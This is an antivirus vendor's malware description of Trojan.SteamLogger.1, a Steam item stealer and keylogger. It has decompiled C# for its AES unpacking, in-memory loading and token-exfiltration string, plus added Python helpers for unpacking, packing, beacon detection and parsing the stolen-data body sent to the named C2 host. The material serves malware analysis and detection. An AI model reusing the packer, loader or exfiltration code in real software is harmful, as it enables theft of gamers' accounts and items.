Trojan.SteamLogger.1

Added to the Dr.Web virus database: 2014-10-24

This malicious program is designed to steal valuable game assets, tools and artifacts from users of the Steam gaming platform, mostly from fans of Dota 2, Counter-Strike: Global Offensive and Team Fortress 2. However, it can easily be tweaked to steal assets of other games. It also logs keystrokes and transmits the information to criminals.

The Trojan consists of three modules: a dropper, a service module and the main module. When Trojan.SteamLogger.1 is executed, it decrypts and extracts the main and the service modules from its body. The decryption is performed in two steps:

  1. Reading the image into memory and applying a simple byte transformation (each byte is decreased by its index plus 27):
    // Stage-1 decoding of the embedded resource: output byte i = text[i] - i - 27.
    // Convert.ToByte() throws if the result leaves the 0..255 range.
    public static byte[] D(byte[] text)
    {
        byte[] array = new byte[text.Length];
        for (int i = 0; i < text.Length; i++)
        {
            array[i] = Convert.ToByte((int)text[i] - i - 27);
        }
        return array;
    }
    
  2. Decrypting with the AES algorithm:
    private static byte[] code = new byte[]  // AES key as stored in the sample
    {
        149, 133, 127, 135, 145, 135, 134, 144, 147, 141, 159, 138, 136
    };
     
    public byte[] SymmetricDecrypt(byte[] input, byte[] key)
    {
        byte[] result;
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
        {
            rijndaelManaged.BlockSize = 128;
            rijndaelManaged.KeySize = 256;
            // Input layout: the first 16 bytes hold the CBC IV, itself encrypted
            // with AES-ECB under the same key; the remainder is the AES-CBC
            // ciphertext of the module, PKCS7-padded.
            byte[] array = new byte[16];
            byte[] rgbIV = new byte[array.Length];
            Array.Copy(input, 0, array, 0, array.Length);
            byte[] array2 = new byte[input.Length - array.Length];
            Array.Copy(input, array.Length, array2, 0, array2.Length);
            // Step 1: recover the IV with a single ECB block decryption.
            rijndaelManaged.Mode = CipherMode.ECB;
            rijndaelManaged.Padding = PaddingMode.None;
            using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(key, null))
            {
                rgbIV = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
            }
            // Step 2: decrypt the payload in CBC mode with the recovered IV.
            rijndaelManaged.Mode = CipherMode.CBC;
            rijndaelManaged.Padding = PaddingMode.PKCS7;
            using (ICryptoTransform cryptoTransform2 = rijndaelManaged.CreateDecryptor(key, rgbIV))
            {
                using (MemoryStream memoryStream = new MemoryStream(array2))
                {
                    using (CryptoStream cryptoStream = new CryptoStream(memoryStream, cryptoTransform2, CryptoStreamMode.Read))
                    {
                        byte[] array3 = new byte[array2.Length];
                        int num = cryptoStream.Read(array3, 0, array3.Length);
                        byte[] array4 = new byte[num];
                        Array.Copy(array3, 0, array4, 0, num);
                        result = array4;
                    }
                }
            }
        }
        return result;
    }
    

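The two-stage unpacking described above, re-implemented in Python as an added example (not code from the Trojan or from Dr.Web) so an analyst can unpack a sample offline. It assumes the `cryptography` package, a constructed 32-byte key in place of the real one, and takes the stage-1 byte arithmetic modulo 256; the constructed packer exists only to build sample input.

```python
# Added example: mirrors D() + SymmetricDecrypt() from the description above.
# Assumptions: `cryptography` is installed; SAMPLE_KEY/SAMPLE_IV are constructed;
# stage-1 arithmetic is taken mod 256 (the original uses Convert.ToByte()).
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes


def stage1_undo(data: bytes) -> bytes:
    """Inverse of the dropper's D(): subtract (index + 27) from each byte."""
    return bytes((b - i - 27) & 0xFF for i, b in enumerate(data))


def symmetric_decrypt(blob: bytes, key: bytes) -> bytes:
    """Mirror of SymmetricDecrypt(): bytes 0..15 are the CBC IV encrypted with
    AES-ECB under the same key; the rest is AES-CBC/PKCS7 ciphertext."""
    enc_iv, body = blob[:16], blob[16:]
    ecb = Cipher(algorithms.AES(key), modes.ECB()).decryptor()
    iv = ecb.update(enc_iv) + ecb.finalize()
    cbc = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = cbc.update(body) + cbc.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


def unpack(resource: bytes, key: bytes) -> bytes:
    """Full pipeline: stage-1 byte transform, then the two-step AES scheme."""
    return symmetric_decrypt(stage1_undo(resource), key)


def pack_like_dropper(plaintext: bytes, key: bytes, iv: bytes) -> bytes:
    """Constructed helper that builds a resource in the layout unpack() expects."""
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext) + pad.finalize()
    cbc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    body = cbc.update(padded) + cbc.finalize()
    ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    enc_iv = ecb.update(iv) + ecb.finalize()
    # Apply the inverse of D() so stage1_undo() recovers the AES blob.
    return bytes((b + i + 27) & 0xFF for i, b in enumerate(enc_iv + body))


SAMPLE_KEY = bytes(range(32))                       # constructed 256-bit key
SAMPLE_IV = b"\x11" * 16                            # constructed IV
SAMPLE_PAYLOAD = b"MZ" + b"\x00" * 40 + b"constructed-fake-module-body"

if __name__ == "__main__":
    resource = pack_like_dropper(SAMPLE_PAYLOAD, SAMPLE_KEY, SAMPLE_IV)
    recovered = unpack(resource, SAMPLE_KEY)
    print("recovered", len(recovered), "bytes, header", recovered[:2])
```
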
After decryption, the dropper stores the service module in the %TEMP% folder as Update.exe and launches it; the main module is loaded straight into memory from the decrypted byte array by means of the Assembly.Load() routine, after which its entry point is invoked:

Assembly assembly = Assembly.Load(array);
program.Invoke(assembly, assembly.EntryPoint);

The malware then downloads a graphics file from hxxp://keys-trade.ru/trade/?image=, saves it on the infected computer into the %TEMP% folder as %process_name%.jpg and immediately displays the image on the screen.

The service module checks whether the folder %ProgramFiles% (x86)\Common Files\Steam\ exists (the path is built by appending " (x86)\Common Files\Steam\" to %ProgramFiles%) and creates it if it does not. After that, the module copies itself to this folder under the name SteamService.exe, sets the "system" and "hidden" attributes on the executable, modifies the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, which is responsible for launching applications automatically at startup, and then launches the service module.

Once loaded on an infected computer, the service module sends a request to the cybercriminals' command and control server using the POST method (hxxp://keys-trade.ru/bot/check=) and, if the instruction "OK" is not returned, it attempts to establish a connection to the command and control server via one of the proxy servers on its hardcoded list.

The Trojan transmits information about the infected computer to the command and control server at hxxp://keys-trade.ru/bot/. The data includes the operating system version and platform, as well as the malware's unique identifier, which is generated from the serial number of the hard disk that contains the C: partition. In addition, at 50-minute intervals the Trojan sends the remote server a POST request and, upon receipt of a download instruction, downloads and installs an updated version of the service module by replacing the executable stored as %TEMP%\Update.exe.

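A detection check for the check-in behaviour just described, added here as an example (not Dr.Web's code): it runs over constructed proxy log lines and flags hosts that POST to keys-trade.ru at roughly the 50-minute cadence. The log format ("epoch src_ip method url"), the sample hosts and the 10% jitter tolerance are assumptions.

```python
# Added example: beacon detection for the C2 cadence in the description above.
# The log format and all sample lines below are constructed.
from collections import defaultdict

C2_HOST = "keys-trade.ru"      # command and control host named in the report
BEACON_SECONDS = 50 * 60       # 50-minute POST check-in interval
TOLERANCE = 0.10               # assumed: accept +/-10% jitter around the period

SAMPLE_LOG = """\
1414137600 10.0.0.5 POST http://keys-trade.ru/bot/
1414137610 10.0.0.7 GET http://example.invalid/index.html
1414140600 10.0.0.5 POST http://keys-trade.ru/bot/
1414143600 10.0.0.5 POST http://keys-trade.ru/bot/
1414143700 10.0.0.7 POST http://keys-trade.ru/bot/
"""


def parse_log(text: str) -> list:
    """Parse constructed 'epoch src method url' lines into tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, url = line.split(maxsplit=3)
        rows.append((int(ts), src, method, url))
    return rows


def any_c2_contact(rows: list) -> set:
    """Immediate signal: every host that talked to the C2 domain at all."""
    return {src for _, src, _, url in rows if C2_HOST in url}


def find_beaconing_hosts(rows: list) -> dict:
    """Return {src_ip: [gaps_in_seconds]} for hosts whose POSTs to the C2 host
    show at least two consecutive gaps within tolerance of 50 minutes."""
    stamps_by_src = defaultdict(list)
    for ts, src, method, url in rows:
        if method == "POST" and C2_HOST in url:
            stamps_by_src[src].append(ts)
    hits = {}
    for src, stamps in stamps_by_src.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        periodic = [g for g in gaps
                    if abs(g - BEACON_SECONDS) <= BEACON_SECONDS * TOLERANCE]
        if len(periodic) >= 2:
            hits[src] = gaps
    return hits


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    print("contacted C2:", sorted(any_c2_contact(rows)))
    print("beaconing:", find_beaconing_hosts(rows))
```
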
When launched, the Trojan's main module checks whether the command and control server is available. After initialization it searches the memory of the infected system for a Steam process and verifies whether the user has logged on to the Steam server under their account. If not, the malicious program waits for the server to authorize the player, then extracts information about the Steam account (whether SteamGuard is enabled, the steam-id and the security token) and sends the data to the cybercriminals. The Trojan then waits for a string containing the data needed for the later transfer of game items from the compromised account. The string has the following format:

steam-id,partner,token|steam-id,partner,token|...

where steam-id, partner and token are the parameters of the trade request.

After this, the Trojan searches the Steam folder for files matching the "ssfn*" mask and creates the following string:

ssfn_filename_1|ssfn_file1_data||ssfn_filename_2|ssfn_file2_data||...

It then extracts the files stored in the config\ folder of the Steam application and builds the same kind of string from them. The Trojan then appends this string to the existing one and removes every "-" character from the result. After that, the victim's account data are appended to the end of the resulting string, which is then compressed and encoded with the Base64 algorithm:

// Append the victim's own session data to the string built from the ssfn* and config\ files.
text = text + "steamLogin.txt|" + this.ToStrByte(this._token) + "||";
text = text + "steamLoginSecure.txt|" + this.ToStrByte(this._login_secure) + "||";
string text6 = text;
text = string.Concat(new string[]
{
    text6,
    "steamMachineAuth",
    this._steam_id,
    ".txt|",
    this.ToStrByte(this._machine_auth)
});
// Compress the record set, Base64-encode it and place it in the POST body.
byte[] inArray = this.Compress(Encoding.UTF8.GetBytes(text));
text = "steam_id=" + this._steam_id + "&receive=" + Convert.ToBase64String(inArray);

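A triage helper for the exfiltration format above and for the trade string received from the server, added here as an example (not code from the Trojan or from Dr.Web): it rebuilds a body in the "name|data||..." layout from constructed data and parses a captured body back into files. It assumes that Compress() is gzip and that ToStrByte() produces hex like BitConverter.ToString(), which would explain the "-" stripping; neither is stated on the page.

```python
# Added example: build and parse the "steam_id=...&receive=<base64>" body.
# Assumptions: Compress() == gzip; ToStrByte() == hyphen-separated hex with the
# hyphens removed. SAMPLE_FILES is constructed, not real Steam data.
import base64
import gzip


def build_receive_body(steam_id: str, files: dict) -> str:
    """Rebuild the body the way the snippet above concatenates it:
    name|hexdata records joined by '||', then compressed and Base64-encoded."""
    records = [f"{name}|{data.hex().upper()}" for name, data in files.items()]
    text = "||".join(records)
    blob = gzip.compress(text.encode("utf-8"))
    return f"steam_id={steam_id}&receive={base64.b64encode(blob).decode('ascii')}"


def parse_receive_body(body: str) -> tuple:
    """Decode a captured body into (steam_id, {filename: bytes}).
    The query string is split by hand: urllib.parse.parse_qs would turn the
    '+' characters of the Base64 blob into spaces and corrupt it."""
    params = dict(kv.split("=", 1) for kv in body.split("&"))
    raw = gzip.decompress(base64.b64decode(params["receive"])).decode("utf-8")
    files = {}
    for record in raw.split("||"):
        if not record:
            continue                      # tolerate a trailing '||'
        name, _, hexdata = record.partition("|")
        files[name] = bytes.fromhex(hexdata)
    return params["steam_id"], files


def parse_trade_targets(trade_string: str) -> list:
    """Parse the 'steam-id,partner,token|...' string the server sends."""
    return [tuple(item.split(",", 2)) for item in trade_string.split("|") if item]


SAMPLE_FILES = {                          # constructed names and contents
    "ssfn1234567890123456": b"\x01\x02\xab\xcd",
    "config\\constructed.vdf": b'"constructed" {}',
    "steamLogin.txt": b"76561190000000000%7C%7Cconstructedtoken",
}

if __name__ == "__main__":
    body = build_receive_body("76561190000000000", SAMPLE_FILES)
    steam_id, files = parse_receive_body(body)
    print(steam_id, sorted(files))
    print(parse_trade_targets("76561190000000001,123,abcd|76561190000000002,456,ef01"))
```
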
The malicious program obtains a list of accounts to which game items from the compromised account can be transferred. All the collected data are sent to the criminals' server, after which the Trojan checks whether automatic authorization is enabled in the Steam settings. If the feature is disabled, the malware creates a separate thread to run the keylogger. Information about logged keystrokes is sent to the attackers at 15-second intervals.

To search the inventory for valuable in-game items, the Trojan uses the following filters:

// Steam application IDs of the targeted games: 570 = Dota 2, 730 = Counter-Strike: Global Offensive, 440 = Team Fortress 2
private static int[] games = new int[]
{
    570,
    730,
    440
};
// Item rarities treated as valuable
string[] source = new string[]
{
    "Mythical",
    "Legendary",
    "Arcana",
    "Immortal"
};
// Dota 2 treasure (chest) keys
string[] source2 = new string[]
{
    "DOTA_WearableType_Treasure_Key"
};
// Chests: containers and supply crates
string[] source3 = new string[]
{
    "Container",
    "Supply Crate"
};

The malware filters items for Dota 2, Counter-Strike: Global Offensive and Team Fortress 2: in other words, the Trojan attempts to steal the most valuable in-game items, chests and chest keys. Trojan.SteamLogger.1 also monitors whether players attempt to sell any of their virtual items themselves and, if they do, automatically removes the items from the sale dialog box. All the stolen virtual items are transferred to the cybercriminals' accounts.

To sell Dota 2 chest keys, the malware authors have even created a special eStore.

